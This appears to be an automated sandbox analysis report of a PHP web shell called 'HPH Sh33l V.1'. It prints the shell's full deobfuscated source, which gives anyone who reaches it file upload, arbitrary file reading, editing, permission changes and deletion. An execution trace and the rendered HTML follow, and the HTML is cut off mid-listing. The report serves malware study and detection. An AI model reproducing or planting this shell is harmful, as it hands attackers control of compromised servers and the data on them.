PHP Malware Analysis

shellsk.php

md5: b769a44ef78f0d5f40beb183ab705659

Jump to:

Screenshot


Attributes

Environment

Files

Input

Title

URLs


Deobfuscated PHP code

<?php

set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
    foreach ($_POST as $key => $value) {
        $_POST[$key] = stripslashes($value);
    }
}
?>
<!DOCTYPE html>
<html lang="en-US">

		 <head>
			 <meta charset="utf-8">
			 <meta name="viewport" content="width=device-width">
			 
				<title>HPH Sh33l V.1</title>
				<link rel="icon" href="https://i.ibb.co/PcxnLxh/FB-IMG-1656485414925.jpg" />
				<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type="text/css">
				<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/MKY.css" type="text/css">
				
		 </head>
		 
		 <body>
		  <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
				<center>
				<img width="300" height="300" src="https://i.ibb.co/PcxnLxh/FB-IMG-1656485414925.jpg"><br><br><audio src="https://b.top4top.io/m_1832kvrfv2.m4a" type="audio/mpeg" controls="controls" autoplays="autoplays"></a>
				</center>
			 <center><h4><font face="courier new" color="red">Ganteng Doang Upload Shell Gak Bisa</font></h4></center>
			 <br>
			 <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
				<tr>
					<td>
						<?php 
echo php_uname();
?>
						
						<br>
<?php 
if (isset($_GET['path'])) {
    $path = $_GET['path'];
} else {
    $path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
    if ($pat == '' && $id == 0) {
        $a = true;
        echo "\n\t\t\t\t\t\t<a class=\"wrn\" href=\"?path=/\">/</a>";
        continue;
    }
    if ($pat == '') {
        continue;
    }
    echo "\t\t\t\t\t\t\t\n\t\t\t\t\t\t<a class=\"wrn\" href=\"?path=";
    for ($i = 0; $i <= $id; $i++) {
        echo "{$paths[$i]}";
        if ($i != $id) {
            echo "/";
        }
    }
    echo '">' . $pat . '</a>/';
}
echo "\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n\n\t\t\t\t<tr>\n\t\t\t\t\t<td>";
if (isset($_FILES['file'])) {
    if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
        echo "\n\t\t\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br>\n\t\t\t\t\t\t";
    } else {
        echo "\n\t\t\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br>\n\t\t\t\t\t\t";
    }
}
?>

						<form enctype="multipart/form-data" method="POST">
							<input type="file" name="file" />
							<input type="submit" value=">>" />
						</form>
					</td>
				</tr>
<?php 
if (isset($_GET['filesrc'])) {
    echo "\t\t\t\t<tr>\n\t\t\t\t\t<td>\n\t\t\t\t\t\n\t\t\t\t\t<br>\n\t\t\t\t\t\n\t\t\t\t\t<center>\n\t\t\t\t\t";
    echo "<font color=\"#00FF66 \">" . $_GET['filesrc'] . "</font>";
    echo "\n\t\t\t\t\t</center>\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n\t\t\t</table>\n\t\t\t\n\t\t\t<br>";
    echo '
			
			<pre>
' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '			
			</pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
    echo '				</table>
		 
				<br>
		 
				<center>' . $_POST['path'] . '
				
				<br>
				<br>';
    if ($_POST['opt'] == 'chmod') {
        if (isset($_POST['perm'])) {
            if (chmod($_POST['path'], $_POST['perm'])) {
                echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
            } else {
                echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
            }
        }
        ?>


				<form method="POST">
					Permission : 
					<input name="perm" type="text" size="4" value="<?php 
        echo substr(sprintf('%o', fileperms($_POST['path'])), -4);
        ?>" />
					<input type="hidden" name="path" value="<?php 
        echo $_POST['path'];
        ?>">
					<input type="hidden" name="opt" value="chmod">
					<input type="submit" value=">>" />
				</form>
<?php 
    } elseif ($_POST['opt'] == 'rename') {
        if (isset($_POST['newname'])) {
            if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
            } else {
                echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
            }
            $_POST['name'] = $_POST['newname'];
        }
        ?>


				<form method="POST">
					New Name : 
					<input name="newname" type="text" size="20" value="<?php 
        echo $_POST['name'];
        ?>" />
					<input type="hidden" name="path" value="<?php 
        echo $_POST['path'];
        ?>">
					<input type="hidden" name="opt" value="rename">
					<input type="submit" value=">>" />
				</form>
<?php 
    } elseif ($_POST['opt'] == 'edit') {
        if (isset($_POST['src'])) {
            $fp = fopen($_POST['path'], 'w');
            if (fwrite($fp, $_POST['src'])) {
                echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
            } else {
                echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
            }
            fclose($fp);
        }
        ?>


				<form method="POST">
				
					<textarea cols=80 rows=20 name="src">
<?php 
        echo htmlspecialchars(file_get_contents($_POST['path']));
        ?>
</textarea>
					
					<br>
					
					<input type="hidden" name="path" value="<?php 
        echo $_POST['path'];
        ?>">
					<input type="hidden" name="opt" value="edit">
					<input type="submit" value=">>" />
				</form>
<?php 
    }
    echo "\t\t\t\t</center>";
} else {
    echo "\t\t\t </table>\n\t\t \n\t\t\t <br>\n\t\t \n\t\t\t <center>";
    if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
        if ($_POST['type'] == 'dir') {
            if (rmdir($_POST['path'])) {
                echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
            } else {
                echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
            }
        } elseif ($_POST['type'] == 'file') {
            if (unlink($_POST['path'])) {
                echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
            } else {
                echo "\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>";
            }
        }
    }
    echo "</center>";
    $scandir = scandir($path);
    ?>


			 <div id="content">
				<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
					<tr class="first">
						<td>
							<center>Name</center>
						</td>
						<td>
							<center>Size</center>
						</td>
						<td>
							<center>Permissions</center>
						</td>
						<td>
							<center>Options</center>
						</td>
					</tr>
					
<?php 
    foreach ($scandir as $dir) {
        if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
            continue;
        }
        echo "\t\t\t\t\t\n\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<a class=\"wrn\" href=\"?path={$path}/{$dir}\">{$dir}</a>\n\t\t\t\t\t\t</td>\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>--</center>\n\t\t\t\t\t\t</td>\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>";
        if (is_writable("{$path}/{$dir}")) {
            echo "<font color=\"#00BB00\">";
        } elseif (!is_readable("{$path}/{$dir}")) {
            echo "<font color=\"red\">";
        }
        echo perms("{$path}/{$dir}");
        if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
            echo "</font>";
        }
        echo "</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\n\t\t\t\t\t\t\t\t<form method=\"POST\" action=\"?option&path={$path}\">\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<select name=\"opt\">\n\t\t\t\t\t\t\t\t\t\t<option value=\"\"></option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"delete\">Delete</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"chmod\">Chmod</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"rename\">Rename</option>\n\t\t\t\t\t\t\t\t\t</select>\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"type\" value=\"dir\">\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n\t\t\t\t\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>";
    }
    ?>

					<tr class="first">
						<td></td>
						<td></td>
						<td></td>
						<td></td>
					</tr>
<?php 
    foreach ($scandir as $file) {
        if (!is_file("{$path}/{$file}")) {
            continue;
        }
        $size = filesize("{$path}/{$file}") / 1024;
        $size = round($size, 3);
        if ($size >= 1024) {
            $size = round($size / 1024, 2) . ' MB';
        } else {
            $size .= ' KB';
        }
        echo "\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<a class=\"wrn\" href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>" . $size . "</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>";
        if (is_writable("{$path}/{$file}")) {
            echo "\n\t\t\t\t\t\t\t\t<font color=\"#00BB00\">";
        } elseif (!is_readable("{$path}/{$file}")) {
            echo "\n\t\t\t\t\t\t\t\t<font color=\"red\">";
        }
        echo perms("{$path}/{$file}");
        if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
            echo "</font>";
        }
        echo "\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\n\t\t\t\t\t\t\t\t<form method=\"POST\" action=\"?option&path={$path}\">\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<select name=\"opt\">\n\t\t\t\t\t\t\t\t\t\t<option value=\"\"></option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"delete\">Delete</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"chmod\">Chmod</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"rename\">Rename</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\"edit\">Edit</option>\n\t\t\t\t\t\t\t\t\t</select>\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"type\" value=\"file\">\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n\t\t\t\t\t\t\t\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n\t\t\t\t\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>";
    }
    echo "\n\t\t\t\t</table>\n\t\t\t</div>";
}
?>


			<br>
			
			<center><br><marquee><b><h4><font face="courier new" color="white">Thanks For 0xGh05T - DSRF14 - Mr.Dan07 - Leri01 - FxshX7 - AlkaExploiter - xLoveSyndrome'z - Acep Gans'z </font></h4></b></marquee></center>
		</body>
</html>
<?php 
function perms($file)
{
    $perms = fileperms($file);
    if (($perms & 0xc000) == 0xc000) {
        $info = 's';
    } elseif (($perms & 0xa000) == 0xa000) {
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        $info = 'p';
    } else {
        $info = 'u';
    }
    $info .= $perms & 0x100 ? 'r' : '-';
    $info .= $perms & 0x80 ? 'w' : '-';
    $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
    $info .= $perms & 0x20 ? 'r' : '-';
    $info .= $perms & 0x10 ? 'w' : '-';
    $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
    $info .= $perms & 0x4 ? 'r' : '-';
    $info .= $perms & 0x2 ? 'w' : '-';
    $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
    return $info;
}

Execution traces

data/traces/b769a44ef78f0d5f40beb183ab705659_trace-1676252221.6222.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:37:27.520045]
1	0	1	0.000131	393528
1	3	0	0.000414	447376	{main}	1		/var/www/html/uploads/shellsk.php	0	0
2	4	0	0.000432	447376	set_time_limit	0		/var/www/html/uploads/shellsk.php	2	1	0
2	4	1	0.000449	447440
2	4	R			FALSE
2	5	0	0.000463	447408	error_reporting	0		/var/www/html/uploads/shellsk.php	2	1	0
2	5	1	0.000476	447448
2	5	R			22527
2	6	0	0.000489	447408	get_magic_quotes_gpc	0		/var/www/html/uploads/shellsk.php	2	0
2	6	1	0.000501	447408
2	6	R			FALSE
2	7	0	0.000515	447408	php_uname	0		/var/www/html/uploads/shellsk.php	27	0
2	7	1	0.000528	447520
2	7	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	8	0	0.000549	447408	getcwd	0		/var/www/html/uploads/shellsk.php	31	0
2	8	1	0.000562	447456
2	8	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/shellsk.php	31	$path = '/var/www/html/uploads'
2	9	0	0.000589	447456	str_replace	0		/var/www/html/uploads/shellsk.php	31	3	'\\'	'/'	'/var/www/html/uploads'
2	9	1	0.000605	447552
2	9	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/shellsk.php	31	$path = '/var/www/html/uploads'
2	10	0	0.000629	447456	explode	0		/var/www/html/uploads/shellsk.php	31	2	'/'	'/var/www/html/uploads'
2	10	1	0.000642	448032
2	10	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/shellsk.php	31	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/shellsk.php	31	$id = 0
1		A						/var/www/html/uploads/shellsk.php	31	$a = TRUE
1		A						/var/www/html/uploads/shellsk.php	31	$id = 1
1		A						/var/www/html/uploads/shellsk.php	33	$i = 0
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	31	$id = 2
1		A						/var/www/html/uploads/shellsk.php	33	$i = 0
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	31	$id = 3
1		A						/var/www/html/uploads/shellsk.php	33	$i = 0
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	31	$id = 4
1		A						/var/www/html/uploads/shellsk.php	33	$i = 0
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	33	$i++
1		A						/var/www/html/uploads/shellsk.php	33	$i++
2	11	0	0.000878	447960	scandir	0		/var/www/html/uploads/shellsk.php	160	1	'/var/www/html/uploads'
2	11	1	0.000909	448584
2	11	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'shellsk.php']
1		A						/var/www/html/uploads/shellsk.php	160	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'shellsk.php']
2	12	0	0.000947	448600	is_dir	0		/var/www/html/uploads/shellsk.php	181	1	'/var/www/html/uploads/.'
2	12	1	0.000963	448664
2	12	R			TRUE
2	13	0	0.000977	448632	is_dir	0		/var/www/html/uploads/shellsk.php	181	1	'/var/www/html/uploads/..'
2	13	1	0.000993	448680
2	13	R			TRUE
2	14	0	0.001006	448640	is_dir	0		/var/www/html/uploads/shellsk.php	181	1	'/var/www/html/uploads/.htaccess'
2	14	1	0.001021	448680
2	14	R			FALSE
2	15	0	0.001034	448640	is_dir	0		/var/www/html/uploads/shellsk.php	181	1	'/var/www/html/uploads/data'
2	15	1	0.001048	448680
2	15	R			TRUE
2	16	0	0.001062	448640	is_writable	0		/var/www/html/uploads/shellsk.php	190	1	'/var/www/html/uploads/data'
2	16	1	0.001078	448680
2	16	R			TRUE
2	17	0	0.001092	448640	perms	1		/var/www/html/uploads/shellsk.php	190	1	'/var/www/html/uploads/data'
3	18	0	0.001105	448640	fileperms	0		/var/www/html/uploads/shellsk.php	263	1	'/var/www/html/uploads/data'
3	18	1	0.001117	448680
3	18	R			16895
2		A						/var/www/html/uploads/shellsk.php	263	$perms = 16895
2		A						/var/www/html/uploads/shellsk.php	263	$info = 'd'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'w'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'x'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'w'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'x'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'w'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'x'
2	17	1	0.001236	448680
2	17	R			'drwxrwxrwx'
2	19	0	0.001250	448640	is_writable	0		/var/www/html/uploads/shellsk.php	190	1	'/var/www/html/uploads/data'
2	19	1	0.001266	448680
2	19	R			TRUE
2	20	0	0.001279	448648	is_dir	0		/var/www/html/uploads/shellsk.php	181	1	'/var/www/html/uploads/prepend.php'
2	20	1	0.001295	448696
2	20	R			FALSE
2	21	0	0.001308	448656	is_dir	0		/var/www/html/uploads/shellsk.php	181	1	'/var/www/html/uploads/shellsk.php'
2	21	1	0.001322	448696
2	21	R			FALSE
2	22	0	0.001335	448640	is_file	0		/var/www/html/uploads/shellsk.php	219	1	'/var/www/html/uploads/.'
2	22	1	0.001350	448664
2	22	R			FALSE
2	23	0	0.001362	448632	is_file	0		/var/www/html/uploads/shellsk.php	219	1	'/var/www/html/uploads/..'
2	23	1	0.001376	448680
2	23	R			FALSE
2	24	0	0.001389	448640	is_file	0		/var/www/html/uploads/shellsk.php	219	1	'/var/www/html/uploads/.htaccess'
2	24	1	0.001403	448680
2	24	R			TRUE
2	25	0	0.001416	448640	filesize	0		/var/www/html/uploads/shellsk.php	219	1	'/var/www/html/uploads/.htaccess'
2	25	1	0.001428	448680
2	25	R			64
1		A						/var/www/html/uploads/shellsk.php	219	$size = 0.0625
2	26	0	0.001452	448584	round	0		/var/www/html/uploads/shellsk.php	219	2	0.0625	3
2	26	1	0.001465	448656
2	26	R			0.063
1		A						/var/www/html/uploads/shellsk.php	219	$size = 0.063
1		A						/var/www/html/uploads/shellsk.php	219	$size = '0.063 KB'
2	27	0	0.001501	448680	is_writable	0		/var/www/html/uploads/shellsk.php	228	1	'/var/www/html/uploads/.htaccess'
2	27	1	0.001516	448720
2	27	R			FALSE
2	28	0	0.001529	448680	is_readable	0		/var/www/html/uploads/shellsk.php	229	1	'/var/www/html/uploads/.htaccess'
2	28	1	0.001543	448720
2	28	R			TRUE
2	29	0	0.001556	448680	perms	1		/var/www/html/uploads/shellsk.php	230	1	'/var/www/html/uploads/.htaccess'
3	30	0	0.001569	448680	fileperms	0		/var/www/html/uploads/shellsk.php	263	1	'/var/www/html/uploads/.htaccess'
3	30	1	0.001582	448720
3	30	R			33188
2		A						/var/www/html/uploads/shellsk.php	263	$perms = 33188
2		A						/var/www/html/uploads/shellsk.php	263	$info = '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'w'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2	29	1	0.001693	448720
2	29	R			'-rw-r--r--'
2	31	0	0.001707	448680	is_writable	0		/var/www/html/uploads/shellsk.php	230	1	'/var/www/html/uploads/.htaccess'
2	31	1	0.001722	448720
2	31	R			FALSE
2	32	0	0.001735	448680	is_readable	0		/var/www/html/uploads/shellsk.php	230	1	'/var/www/html/uploads/.htaccess'
2	32	1	0.001750	448720
2	32	R			TRUE
2	33	0	0.001764	448680	is_file	0		/var/www/html/uploads/shellsk.php	219	1	'/var/www/html/uploads/data'
2	33	1	0.001778	448720
2	33	R			FALSE
2	34	0	0.001791	448688	is_file	0		/var/www/html/uploads/shellsk.php	219	1	'/var/www/html/uploads/prepend.php'
2	34	1	0.001805	448736
2	34	R			TRUE
2	35	0	0.001818	448696	filesize	0		/var/www/html/uploads/shellsk.php	219	1	'/var/www/html/uploads/prepend.php'
2	35	1	0.001831	448736
2	35	R			57
1		A						/var/www/html/uploads/shellsk.php	219	$size = 0.0556640625
2	36	0	0.001854	448592	round	0		/var/www/html/uploads/shellsk.php	219	2	0.0556640625	3
2	36	1	0.001867	448664
2	36	R			0.056
1		A						/var/www/html/uploads/shellsk.php	219	$size = 0.056
1		A						/var/www/html/uploads/shellsk.php	219	$size = '0.056 KB'
2	37	0	0.001911	448808	is_writable	0		/var/www/html/uploads/shellsk.php	228	1	'/var/www/html/uploads/prepend.php'
2	37	1	0.001926	448848
2	37	R			FALSE
2	38	0	0.001939	448808	is_readable	0		/var/www/html/uploads/shellsk.php	229	1	'/var/www/html/uploads/prepend.php'
2	38	1	0.001954	448848
2	38	R			TRUE
2	39	0	0.001967	448808	perms	1		/var/www/html/uploads/shellsk.php	230	1	'/var/www/html/uploads/prepend.php'
3	40	0	0.001979	448808	fileperms	0		/var/www/html/uploads/shellsk.php	263	1	'/var/www/html/uploads/prepend.php'
3	40	1	0.001993	448848
3	40	R			33261
2		A						/var/www/html/uploads/shellsk.php	263	$perms = 33261
2		A						/var/www/html/uploads/shellsk.php	263	$info = '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'w'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'x'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'x'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'x'
2	39	1	0.002104	448848
2	39	R			'-rwxr-xr-x'
2	41	0	0.002118	448808	is_writable	0		/var/www/html/uploads/shellsk.php	230	1	'/var/www/html/uploads/prepend.php'
2	41	1	0.002132	448848
2	41	R			FALSE
2	42	0	0.002145	448808	is_readable	0		/var/www/html/uploads/shellsk.php	230	1	'/var/www/html/uploads/prepend.php'
2	42	1	0.002159	448848
2	42	R			TRUE
2	43	0	0.002173	448808	is_file	0		/var/www/html/uploads/shellsk.php	219	1	'/var/www/html/uploads/shellsk.php'
2	43	1	0.002187	448848
2	43	R			TRUE
2	44	0	0.002199	448808	filesize	0		/var/www/html/uploads/shellsk.php	219	1	'/var/www/html/uploads/shellsk.php'
2	44	1	0.002211	448848
2	44	R			9079
1		A						/var/www/html/uploads/shellsk.php	219	$size = 8.8662109375
2	45	0	0.002242	448704	round	0		/var/www/html/uploads/shellsk.php	219	2	8.8662109375	3
2	45	1	0.002255	448776
2	45	R			8.866
1		A						/var/www/html/uploads/shellsk.php	219	$size = 8.866
1		A						/var/www/html/uploads/shellsk.php	219	$size = '8.866 KB'
2	46	0	0.002290	448808	is_writable	0		/var/www/html/uploads/shellsk.php	228	1	'/var/www/html/uploads/shellsk.php'
2	46	1	0.002305	448848
2	46	R			FALSE
2	47	0	0.002318	448808	is_readable	0		/var/www/html/uploads/shellsk.php	229	1	'/var/www/html/uploads/shellsk.php'
2	47	1	0.002332	448848
2	47	R			TRUE
2	48	0	0.002344	448808	perms	1		/var/www/html/uploads/shellsk.php	230	1	'/var/www/html/uploads/shellsk.php'
3	49	0	0.002356	448808	fileperms	0		/var/www/html/uploads/shellsk.php	263	1	'/var/www/html/uploads/shellsk.php'
3	49	1	0.002369	448848
3	49	R			33204
2		A						/var/www/html/uploads/shellsk.php	263	$perms = 33204
2		A						/var/www/html/uploads/shellsk.php	263	$info = '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'w'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'w'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= 'r'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2		A						/var/www/html/uploads/shellsk.php	263	$info .= '-'
2	48	1	0.002479	448848
2	48	R			'-rw-rw-r--'
2	50	0	0.002493	448808	is_writable	0		/var/www/html/uploads/shellsk.php	230	1	'/var/www/html/uploads/shellsk.php'
2	50	1	0.002508	448848
2	50	R			FALSE
2	51	0	0.002521	448808	is_readable	0		/var/www/html/uploads/shellsk.php	230	1	'/var/www/html/uploads/shellsk.php'
2	51	1	0.002535	448848
2	51	R			TRUE
1	3	1	0.002549	448744
			0.002576	326208
TRACE END   [2023-02-12 23:37:27.522516]


Generated HTML code

<html lang="en-US"><head>
			 <meta charset="utf-8">
			 <meta name="viewport" content="width=device-width">
			 
				<title>HPH Sh33l V.1</title>
				<link rel="icon" href="https://i.ibb.co/PcxnLxh/FB-IMG-1656485414925.jpg">
				<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type="text/css">
				<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/MKY.css" type="text/css">
				
		 </head>
		 
		 <body>
		  <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
				<center>
				<img width="300" height="300" src="https://i.ibb.co/PcxnLxh/FB-IMG-1656485414925.jpg"><br><br><audio src="https://b.top4top.io/m_1832kvrfv2.m4a" type="audio/mpeg" controls="controls" autoplays="autoplays">
				</audio></center>
			 <center><h4><font face="courier new" color="red">Ganteng Doang Upload Shell Gak Bisa</font></h4></center>
			 <br>
			 <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
				<tbody><tr>
					<td>
						Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64						
						<br>

						<a class="wrn" href="?path=/">/</a>							
						<a class="wrn" href="?path=/var">var</a>/							
						<a class="wrn" href="?path=/var/www">www</a>/							
						<a class="wrn" href="?path=/var/www/html">html</a>/
					</td>
				</tr>

				<tr>
					<td>
						<form enctype="multipart/form-data" method="POST">
							<input type="file" name="file">
							<input type="submit" value=">>">
						</form>
					</td>
				</tr>
			 </tbody></table>
		 
			 <br>
		 
			 <center></center>

			 <div id="content">
				<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
					<tbody><tr class="first">
						<td>
							<center>Name</center>
						</td>
						<td>
							<center>Size</center>
						</td>
						<td>
							<center>Permissions</center>
						</td>
						<td>
							<center>Options</center>
						</td>
					</tr>
					

					<tr class="first">
						<td></td>
						<td></td>
						<td></td>
						<td></td>
					</tr>
					<tr>
						<td>
							<a class="wrn" href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a>
						</td>
						
						<td>
							<center>0 KB</center>
						</td>
						<td>
							<center>-rw-r--r--
							</center>
						</td>
						<td>
							<center>
								<form method="POST" action="?option&amp;path=/var/www/html">
								
									<select name="opt">
										<option value=""></option>
										<option value="delete">Delete</option>
										<option value="chmod">Chmod</option>
										<option value="rename">Rename</option>
										<option value="edit">Edit</option>
									</select>
									
									<input type="hidden" name="type" value="file">
									<input type="hidden" name="name" value="beneri.se_malware_analysis">
